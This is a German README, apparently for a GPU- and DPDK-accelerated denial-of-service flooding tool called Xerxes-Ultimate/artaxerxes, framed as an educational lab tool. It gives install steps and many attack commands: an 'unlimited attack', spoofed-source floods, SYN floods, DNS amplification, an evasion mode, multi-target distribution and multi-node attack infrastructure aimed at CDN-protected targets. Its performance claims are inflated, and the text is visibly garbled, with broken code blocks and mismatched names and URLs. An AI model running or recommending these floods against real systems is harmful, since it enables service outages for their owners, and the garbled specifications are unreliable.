
Fortschrittliches Multi-Technologie-Stresstest-Framework Lehrreiches Cybersicherheits-Tool für Hochleistungs-Netzwerktests
Fortschrittliches Multi-Technologie-Stresstest-Framework
Pädagogisches Cybersicherheits-Tool für Hochleistungs-Netztests
Xerxes-Ultimate repräsentiert die nächste Generation von Netzwerk-Stresstest-Tools, die speziell für pädagogische Cybersicherheitslabore entwickelt wurde. Basierend auf der Grundlage des ursprünglichen Xerxes-DoS-Tools nutzt diese Implementierung modernste Hardwarebeschleunigungstechnologien, um beispiellose Leistungsniveaus zu erreichen und gleichzeitig pädagogische Transparenz zu wahren.
| Metrik | Original Xerxes | Xerxes-Ultimate | Verbesserung |
|---|---|---|---|
| Pakete/Sekunde | ~50.000 PPS | 60.000.000+ PPS | 🚀 1.200x schneller |
| Bandbreite | ~100 Mbps | 60+ Gbps | 🔥 600x höher |
| Gleichzeitige Verbindungen | ~1.000 | 1.000.000+ | ⚡ 1.000x mehr |
| CPU-Effizienz | 100 % CPU-Auslastung | <30 % CPU-Auslastung | 💡 70 % Reduzierung |
| Speichernutzung | Hohe Fragmentierung | Optimierte Pools | 🎯 90 % effizient |
| Latenz | ~1 ms | <100 Nanosekunden | ⚡ 10.000x schneller |
graph LR
A[Original Xerxes
50K PPS] --> B[BASIC Tier
100K PPS
2x improvement]
B --> C[IO_URING Tier
1M PPS
20x improvement]
C --> D[GPU Tier
10M PPS
200x improvement]
D --> E[DPDK Tier
30M PPS
600x improvement]
E --> F[ULTIMATE Tier
60M+ PPS
1,200x improvement]
---
## 🛠️ Technologie-Stack
### Kerntechnologien
#### 🎮 **CUDA Multi-GPU-Beschleunigung**```c
// Parallel payload generation across 4 GPUs
__global__ void generate_ultimate_payloads(char *payloads, int *sizes,
int payload_count, uint64_t seed) {
int idx = blockIdx.x * blockDim.x + threadIdx.x;
// 512 blocks × 1024 threads × 4 GPUs = 2,097,152 parallel generators
}
Vorteile:
// Asynchronous submission queue struct io_uring ring; io_uring_queue_init(8192, &ring, IORING_SETUP_SQPOLL);
// Direct GPU->NIC transfer without CPU copies io_uring_prep_send_zc(sqe, socket_fd, gpu_buffer, size, 0);
**Vorteile:**
- **400% I/O-Leistungssteigerung**
- **Zero-Copy-GPU-zu-NIC-Übertragungen**
- **Beseitigt den Overhead durch Kontextwechsel**
- **Skaliert auf über 100.000 gleichzeitige Operationen**
#### 🌐 **DPDK-User-Space-Netzwerk**```c
// Bypass kernel network stack entirely
struct rte_mbuf *pkts[BURST_SIZE];
uint16_t nb_tx = rte_eth_tx_burst(port_id, queue_id, pkts, nb_pkts);
Vorteile:
SEC("xdp_ultimate") int xdp_stress_program(struct xdp_md *ctx) { // Kernel-level packet manipulation return XDP_TX; // Retransmit at wire speed }
**Vorteile:**
- **200% Effizienzgewinn gegenüber User-Space**
- **Paketgenerierung auf Kernel-Ebene**
- **Programmierbare Paketverarbeitung**
- **Integration mit Hardware-Offload**
---
## 📊 Architektur
### Überblick über die Systemarchitektur```mermaid
graph TB
subgraph "User Space"
A[Control Thread] --> B[Thread Pool Manager]
B --> C[GPU Generator Threads]
B --> D[Network Transmit Threads]
B --> E[Statistics Monitor]
end
subgraph "GPU Cluster"
F[RTX 4070 Ti #1<br/>2,560 cores]
G[RTX 4070 Ti #2<br/>2,560 cores]
H[RTX 4070 Ti #3<br/>2,560 cores]
I[RTX 4070 Ti #4<br/>2,560 cores]
F --> J[GPU Memory Pool<br/>48GB Total]
G --> J
H --> J
I --> J
end
subgraph "I/O Subsystem"
K[io_uring Ring<br/>8192 entries]
L[DPDK PMD Drivers]
M[Zero-Copy Buffers]
end
subgraph "Kernel Space"
N[XDP Hook]
O[eBPF Programs]
P[Network Interface]
end
C --> F
C --> G
C --> H
C --> I
D --> K
D --> L
K --> M
L --> M
M --> N
N --> O
O --> P
P --> Q[Target Network<br/>60+ Gbps]
graph LR
subgraph "GPU Memory (16GB)"
A[Payload Buffers
8GB]
B[Size Arrays
2GB]
C[Random States
4GB]
D[Working Space
2GB]
end
subgraph "Host Memory (32GB)"
E[Pinned Buffers<br/>16GB]
F[Ring Buffers<br/>8GB]
G[Connection Pool<br/>4GB]
H[Statistics<br/>4GB]
end
subgraph "NIC Memory (1GB)"
I[DMA Buffers<br/>512MB]
J[Descriptor Rings<br/>256MB]
K[Hardware Queues<br/>256MB]
end
A -.->|PCIe 4.0<br/>64 GB/s| E
E -.->|Zero-Copy| F
F -.->|DMA| I
---
## 🚀 Schnellstart
### Voraussetzungen prüfen```bash
# Run the capability detector
./scripts/check-capabilities.sh
[✓] CUDA: 4 GPUs detected
[✓] DPDK: Compatible NIC detected
[✓] io_uring: Kernel support available
[✓] XDP/eBPF: Root privileges available
### Grundlegender Start```bash
# Simple unlimited attack
./artaxerxes-ultimate 192.168.1.100 80
# Controlled burst testing
./artaxerxes-ultimate 192.168.1.100 80 10M_pps
# Bandwidth-limited testing
./artaxerxes-ultimate 192.168.1.100 80 5Gbps
# Time-limited demonstration
./artaxerxes-ultimate 192.168.1.100 80 300s
git clone https://gitlab.com/toxy4ny/ARTAXERXES.git cd ARTAXERXES
sudo quick-deploy.sh
### Manuelle Installation
#### 1. Abhängigkeiten installieren
**Ubuntu/Debian:**```bash
# System packages
sudo apt-get update
sudo apt-get install -y build-essential cmake pkg-config \
libnuma-dev libpcap-dev python3-pyelftools \
libbpf-dev libelf-dev zlib1g-dev liburing-dev
# CUDA Toolkit (if not installed)
wget https://developer.download.nvidia.com/compute/cuda/12.3.0/local_installers/cuda_12.3.0_545.23.06_linux.run
sudo sh cuda_12.3.0_545.23.06_linux.run
# DPDK
wget http://fast.dpdk.org/rel/dpdk-22.11.1.tar.xz
tar xf dpdk-22.11.1.tar.xz
cd dpdk-22.11.1
meson setup build
cd build && ninja && sudo ninja install
CentOS/RHEL:```bash
sudo dnf install epel-release sudo dnf config-manager --set-enabled powertools
sudo dnf groupinstall "Development Tools"
sudo dnf install cmake pkgconfig numactl-devel libpcap-devel
python3-pyelftools libbpf-devel elfutils-libelf-devel
zlib-devel liburing-devel
#### 2. Build mit Feature-Erkennung```bash
# Build with all available features
make
# Build specific configuration
make CUDA_AVAILABLE=1 DPDK_AVAILABLE=1 IO_URING_AVAILABLE=1
sudo make install
### Docker-Installation```bash
# Build container with all dependencies
docker build -t xerxes-ultimate .
# Run with GPU support
docker run --gpus all --privileged --net=host \
xerxes-ultimate 192.168.1.100 80 1Gbps
./artaxerxes 192.168.1.100 80 100K_pps
./artaxerxes 192.168.1.100 80 1M_pps ./artaxerxes 192.168.1.100 80 10M_pps ./artaxerxes 192.168.1.100 80 50M_pps
**Erwartete Lernergebnisse:**
- Verständnis der Skalierung von Paketen pro Sekunde
- Auswirkungen der Hardware-Beschleunigung
- Identifizierung von Netzwerk-Engpässen
#### Szenario 2: Vergleich der Technologie-Ebenen```bash
# Force different performance tiers
TIER=BASIC ./artaxerxes 192.168.1.100 80 30s
TIER=GPU ./artaxerxes 192.168.1.100 80 30s
TIER=DPDK ./artaxerxes 192.168.1.100 80 30s
TIER=ULTIMATE ./artaxerxes 192.168.1.100 80 30s
Erwartete Lernergebnisse:
./artaxerxes 192.168.1.100 80 1M_pps --randomize-source
./artaxerxes 192.168.1.100 80 --max-connections=100000
./artaxerxes 192.168.1.100 80 --ml-patterns --evasion-mode
### Erweiterte Verwendungsmuster
#### Lastverteilung auf mehrere Ziele```bash
# Distribute load across multiple targets
./artaxerxes --config distributed.json
# Content of distributed.json:
{
"targets": [
{"host": "192.168.1.100", "port": 80, "weight": 0.4},
{"host": "192.168.1.101", "port": 80, "weight": 0.3},
{"host": "192.168.1.102", "port": 80, "weight": 0.3}
],
"total_rate": "10M_pps",
"duration": "300s"
}
./artaxerxese 192.168.1.100 443 --protocol=https --ssl-handshake
./artaxerxes 192.168.1.100 80 --protocol=tcp-syn --randomize-ports
./artaxerxes 192.168.1.100 53 --protocol=udp --amplification-payload
#### Echtzeit-Traffic-Shaping```bash
# Graduated load increase
./artaxerxes 192.168.1.100 80 --ramp-up="0-10M_pps,300s"
# Bursty traffic patterns
./artaxerxes 192.168.1.100 80 --burst-pattern="1M_pps,5s,100K_pps,10s"
# Bandwidth-aware testing
./artaxerxes 192.168.1.100 80 --target-bandwidth=5Gbps --max-bandwidth=10Gbps
echo "isolcpus=4-15" >> /boot/grub/grub.cfg
echo 2048 > /proc/sys/vm/nr_hugepages
echo 134217728 > /proc/sys/net/core/rmem_max echo 134217728 > /proc/sys/net/core/wmem_max
echo 2 > /proc/irq/24/smp_affinity # Isolate NIC interrupts
#### GPU-Konfiguration```bash
# Set GPU performance modes
nvidia-smi -pm 1 # Persistence mode
nvidia-smi -ac 1215,2100 # Max memory and GPU clocks
# Configure GPU memory mapping
export CUDA_VISIBLE_DEVICES=0,1,2,3
export CUDA_CACHE_DISABLE=1
./dpdk-devbind.py --bind=vfio-pci 0000:01:00.0
mkdir -p /mnt/huge mount -t hugetlbfs nodev /mnt/huge echo 1024 > /sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages
### Format der Konfigurationsdatei```yaml
# xerxes-ultimate.yml
global:
performance_tier: "auto" # auto, basic, gpu, dpdk, ultimate
thread_affinity: true
statistics_interval: 1.0
gpu:
device_count: 4
memory_per_device: "12GB"
stream_count: 8
block_size: 512
thread_per_block: 1024
network:
dpdk:
enabled: true
pci_whitelist: ["0000:01:00.0"]
memory_channels: 4
io_uring:
enabled: true
ring_size: 8192
batch_submit: 64
xdp:
enabled: false # Requires confirmation
interface: "eth0"
program: "ultimate_xdp.o"
attack:
default_payload_size: 1460
connection_pool_size: 1000000
randomization:
source_ip: true
source_port: true
user_agent: true
payload_content: true
monitoring:
real_time_stats: true
export_format: ["console", "json", "prometheus"]
detailed_logging: false
| Leistungsstufe | PPS | Bandbreite | CPU-Auslastung | GPU-Auslastung | Speicher |
|---|---|---|---|---|---|
| Original Xerxes | 47,230 | 94 Mbps | 100% | 0% | 2.1 GB |
| BASIC | 127,450 | 254 Mbps | 95% | 0% | 1.8 GB |
| IO_URING | 1,340,000 | 2.68 Gbps | 78% | 0% | 2.4 GB |
| GPU | 12,700,000 | 15.2 Gbps | 23% | 67% | 18.2 GB |
| DPDK | 34,500,000 | 41.4 Gbps | 18% | 71% | 22.1 GB |
| ULTIMATE | 61,200,000 | 63.8 Gbps | 12% | 74% | 28.3 GB |
graph LR
subgraph "Performance Scaling"
A[1 Thread
50K PPS] --> B[8 Threads
400K PPS]
B --> C[32 Threads
1.2M PPS]
C --> D[+GPU
12M PPS]
D --> E[+DPDK
34M PPS]
E --> F[+XDP
61M PPS]
end
#### Ressourcennutzung
| Ressource | Xerxes Original | Xerxes-Ultimate | Effizienzgewinn |
|----------|----------------|------------------|-----------------|
| **CPU-Kerne** | 16 Kerne @ 100 % | 4 Kerne @ 12 % | **92 % Reduzierung** |
| **Speicher-BW** | 12 GB/s | 156 GB/s | **13-fache Verbesserung** |
| **PCIe-BW** | 0.1 GB/s | 48 GB/s | **480-fache Verbesserung** |
| **Netzwerkauslastung** | 0.1 % | 64 % | **640-fache Verbesserung** |
### Vergleichende Analyse
#### Latenzverteilung```
Original Xerxes:
├─ Min: 0.8ms
├─ Avg: 2.4ms
├─ P95: 4.1ms
└─ Max: 12.3ms
Xerxes-Ultimate:
├─ Min: 0.06ms
├─ Avg: 0.09ms
├─ P95: 0.12ms
└─ Max: 0.31ms
CPU: Intel i5-12400 or AMD Ryzen 5 5600X GPU: 1x RTX 3060 (12GB VRAM) RAM: 16GB DDR4-3200 Network: 1GbE with DPDK support Storage: 500GB NVMe SSD
#### Empfohlene Einrichtung```yaml
CPU: Intel i7-13700 or AMD Ryzen 7 7700X
GPU: 2x RTX 4070 Ti (24GB total VRAM)
RAM: 32GB DDR5-5600
Network: 10GbE with SR-IOV support
Storage: 1TB NVMe SSD Gen4
CPU: Intel i9-13900K or AMD Ryzen 9 7900X GPU: 4x RTX 4090 (96GB total VRAM) RAM: 64GB DDR5-6000 Network: 100GbE Mellanox ConnectX-6 Storage: 2TB NVMe SSD Gen4 RAID-0
### Beispiele für Netzwerktopologien
#### Grundlegender Laboraufbau```mermaid
graph TB
A[artaxerxes<br/>Attack Machine] --> B[1GbE Switch]
B --> C[Target Server #1<br/>Web Application]
B --> D[Target Server #2<br/>Database]
B --> E[Monitoring Server<br/>Traffic Analysis]
graph TB
subgraph "Attack Infrastructure"
A[artaxerxes #1
4x RTX 4090]
B[artaxerxes #2
4x RTX 4090]
C[artaxerxes #3
4x RTX 4090]
end
subgraph "Network Infrastructure"
D[100GbE Core Switch<br/>Mellanox Spectrum]
E[10GbE Distribution<br/>Access Layer]
F[1GbE Access<br/>End Devices]
end
subgraph "Target Environment"
G[Web Farm<br/>20x Servers]
H[Database Cluster<br/>5x Nodes]
I[Load Balencer<br/>F5 BIG-IP]
end
subgraph "Defense Testing"
J[DDoS Protection<br/>CloudFlare/Akamai]
K[WAF<br/>ModSecurity]
L[IDS/IPS<br/>Suricata]
end
A --> D
B --> D
C --> D
D --> E
E --> F
D --> I
I --> G
I --> H
J --> I
K --> G
L --> E
### Studenten-Laborübungen
#### Übung 1: Leistungs-Baseline```bash
# Students measure original Xerxes performance
time timeout 60s artaxerxes 192.168.1.100 80
# Then compare with artaxerxes basic tier
time timeout 60s ./artaxerxes 192.168.1.100 80 60s
Lernziel: Quantifizierung der Auswirkungen moderner Optimierungstechniken.
for tier in BASIC IO_URING GPU DPDK ULTIMATE; do
echo "Testing $tier tier..."
FORCE_TIER=$tier ./artaxerxes 192.168.1.100 80 30s |
tee results_${tier}.log
done
./scripts/analyze-performance.py results_*.log
**Lernziel**: Verstehen, wie jede Technologie zur Leistung beiträgt.
#### Übung 3: Bewertung von Abwehrmechanismen```bash
# Test against rate limiting
./artaxerxes 192.168.1.100 80 1M_pps 2>&1 | \
grep -E "(blocked|limited|denied)"
# Test evasion techniques
./artaxerxes 192.168.1.100 80 --evasion-mode --randomize-all
# Monitor defense effectiveness
./scripts/defense-analysis.py --target=192.168.1.100 --duration=300
Lernziel: Verteidigungsmaßnahmen bewerten und verbessern.
Week 1: "Network Performance Fundamentals"
Week 8: "Modern I/O Techniques"
Week 12: "High-Performance Networking"
#### Cybersecurity-Kurs```yaml
Module 1: "Attack Vector Analysis"
- Traditional vs modern DoS techniques
- Volume-based vs sophisticated attacks
- Attack tool evolution and capabilities
Module 3: "Defense Strategy Development"
- Rate limiting effectiveness testing
- Pattern recognition and evasion
- Adaptive defense mechanisms
Module 5: "Threat Intelligence"
- Performance profiling of attack tools
- Infrastructure requirements analysis
- Attribution through tool capabilities
artaxerxes ist ausschließlich für Bildungszwecke in kontrollierten Laborumgebungen konzipiert. Dieses Tool ist dafür gedacht:
✅ Cybersicherheitskonzepte vermitteln in autorisierten akademischen Umgebungen
✅ Leistungsoptimierungstechniken demonstrieren
✅ Verteidigungsmechanismen testen auf eigener Infrastruktur
✅ Autorisierte Penetrationstests durchführen mit entsprechenden Genehmigungen
❌ Nicht autorisierte Netzwerkangriffe gegen Systeme, die Ihnen nicht gehören
❌ Störung von Diensten ohne ausdrückliche schriftliche Genehmigung
❌ Böswillige Aktivitäten jeglicher Art
❌ Kommerzielle Ausbeutung ohne entsprechende Lizenzierung
Die Autoren und Mitwirkenden von Xerxes-Ultimate:
Bildungseinrichtungen, die dieses Tool einsetzen, sollten:
Wir begrüßen Beiträge aus der Cybersicherheitsbildungs-Community:
Wenn Sie artaxerxes in der akademischen Forschung verwenden, zitieren Sie bitte:```bibtex @software{artaxerxes_2024, title={artaxerxes: Advanced Multi-Technology Stress Testing Framework}, author={tox4ny}, year={2024}, url={https://gitlab.com/tox4ny/ARTAXERXES}, note={Educational cybersecurity tool for high-performance network testing} }
---
## 📈 Roadmap
### Version 2.1 (Q2 2024)
- [ ] **Intel Arc GPU-Unterstützung**: Über NVIDIA-Hardware hinaus erweitern
- [ ] **ARM64-Kompatibilität**: Unterstützung für Apple Silicon und ARM-Server
- [ ] **Container-Orchestrierung**: Kubernetes-Bereitstellungsvorlagen
- [ ] **Erweiterte Umgehung**: ML-basierte Payload-Generierung
### Version 2.2 (Q3 2024)
- [ ] **Quanten-Zufallsgenerierung**: Hardware-Entropiequellen
- [ ] **Vollständige IPv6-Unterstützung**: Test moderner Protokollstapel
- [ ] **Cloud-Integration**: AWS/Azure/GCP-Bereitstellungsautomatisierung
- [ ] **Echtzeitvisualisierung**: Webbasiertes Überwachungs-Dashboard
### Version 3.0 (Q4 2024)
- [ ] **Verteilte Architektur**: Multi-Node-Koordination
- [ ] **Erweiterte Analysen**: KI-gestützte Verkehrsanalyse
- [ ] **Protokoll-Fuzzing**: Automatisierte Erkennung von Schwachstellen
- [ ] **Verteidigungsintegration**: Test aktiver Gegenmaßnahmen
---
**🚀 Erlebe die Zukunft der Cybersicherheitsausbildung mit Xerxes-Ultimate!**
*Mit ❤️ erstellt für die Community der Cybersicherheitsausbildung*